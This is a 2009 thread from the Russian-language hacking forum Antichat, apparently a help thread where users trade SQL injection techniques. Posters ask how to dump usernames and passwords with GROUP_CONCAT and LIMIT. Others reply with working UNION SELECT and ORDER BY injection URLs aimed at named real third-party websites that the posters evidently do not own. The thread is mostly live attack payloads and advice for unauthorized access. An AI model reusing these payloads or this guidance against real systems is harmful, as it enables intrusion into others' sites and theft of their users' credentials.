ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
28.01.2009, 16:25
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
Блин, ну почему всего этого нету в факе?=(
Спасибо огромное всем, кто помог - но вывестти столбцы так и не удалось, access denied (
|
|
|
28.01.2009, 16:39
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
Сообщение от wildshaman
Спасибо огромное всем, кто помог - но вывестти столбцы так и не удалось, access denied (
Если ты пытался вывести через INFORMATION_SCHEMA то там 4 ветка и там нет INFORMATION_SCHEMA Database.
|
|
|
|
28.01.2009, 16:33
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Я читал,но скобки разве не закрываются в противоположную сторону?(Как обычно)
ascii(substring());
Но если комментарий работает,то почему он не может просто исключить эти скобки,т.к. они стоят за моим комментарием ?
|
|
|
|
28.01.2009, 16:35
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
А если он закрывает скобки предыдущие,то должно быть ))ID,где ID - какое-то число или символ.
ЗЫ:Походу,это выше Вели...
|
|
|
|
28.01.2009, 21:11
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682
Репутация:
30
|
|
HI,
Я как-то задавал аналогичный вопрос, но появился еще один.
Суть такова:
При выводе данных, выводимая информация ограничена, то есть выводится не вся, через лимит выводится гораздо больше.
Мне советовали выводить информацию разными способами, один из них:
GROUP_CONCAT(name,0x3a,pass)+FROM+table+WHERE+ASCI I(lower(name))=97
то есть вывод юзеров на "a".
Перебором я выбрал выбрал нужных юзеров, все ОК.
Теперь вопрос:
Можно ли сразу вывести данные не через перебор как указано выше?
Спасибо!
|
|
|
|
28.01.2009, 21:28
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Octave_Parango Вопрос не понятен, тебе в прошлый раз отвечали, что через GROUP_CONCAT выводится определённое количество символов, сколько именно прописано в group_concat_max_len(по умолчанию 1024), и повлиять на это через инъекцию нельзя, можно только фильтровать данные(тоесть выводить с помощью фильтров, нужных тебе). Ты всегда можешь вывести все данные, не используя GROUP_CONCAT, а используя просто лимит.
name,pass+FROM+table+limit+1,1
В чём вопрос, попробуй переформулировать
|
|
|
|
29.01.2009, 08:43
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682
Репутация:
30
|
|
Сообщение от jokester
Octave_Parango Вопрос не понятен, тебе в прошлый раз отвечали, что через GROUP_CONCAT выводится определённое количество символов, сколько именно прописано в group_concat_max_len(по умолчанию 1024), и повлиять на это через инъекцию нельзя, можно только фильтровать данные(тоесть выводить с помощью фильтров, нужных тебе). Ты всегда можешь вывести все данные, не используя GROUP_CONCAT, а используя просто лимит.
name,pass+FROM+table+limit+1,1
В чём вопрос, попробуй переформулировать
Спасибо за ответ.
Можно в таком случае привести пример на моем случае.
Есть порядка 12к записей.
Лимит не работает, просто не выводит данные и я не представляю перебирать лимитов такое количество.
p.s. Возможно я туплю, но что-то реальный ступор у меня...
|
|
|
|
28.01.2009, 22:18
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
привет всем, вопросик стоит примерно так : есть сайт и как я думаю скуля хотя по моему слепая... перебором даже version () запрос выдаёт тарабарщину примерно вот так $bAY9<j*
http://www.fcsteaua.ro/felicitari/tag/-embleme+order+by+100000000000000000000000
выводит всё на страничку... встречался ли кто нибудь с подобным явлением? Буду очень признателен если мне помогут. Заранее спасибо.
|
|
|
|
28.01.2009, 22:31
|
|
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123
Репутация:
122
|
|
У меня два вопроса:
1. где тут вывод полей?
http://dontime.dn.ua/index.php?new=999999%20union%20select%201,2,3,4,5, 6,7,8,9,10/*
2. как определить количество столбов http://www.aroma-france.info/parfums.php?poll=17%27
|
|
|
|
28.01.2009, 22:41
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Сообщение от TELO
У меня два вопроса:
1. где тут вывод полей?
http://dontime.dn.ua/index.php?new=999999%20union%20select%201,2,3,4,5, 6,7,8,9,10/*
2. как определить количество столбов http://www.aroma-france.info/parfums.php?poll=17%27
1. http://dontime.dn.ua/index.php?new=999999%20union%20select%201,2,3,4,ve rsion(),%20%206,7,8,9,10,11,12/*
2. http://www.aroma-france.info/parfums.php?poll=17'+order+by+5--+
Последний раз редактировалось R1dex; 28.01.2009 в 22:47..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
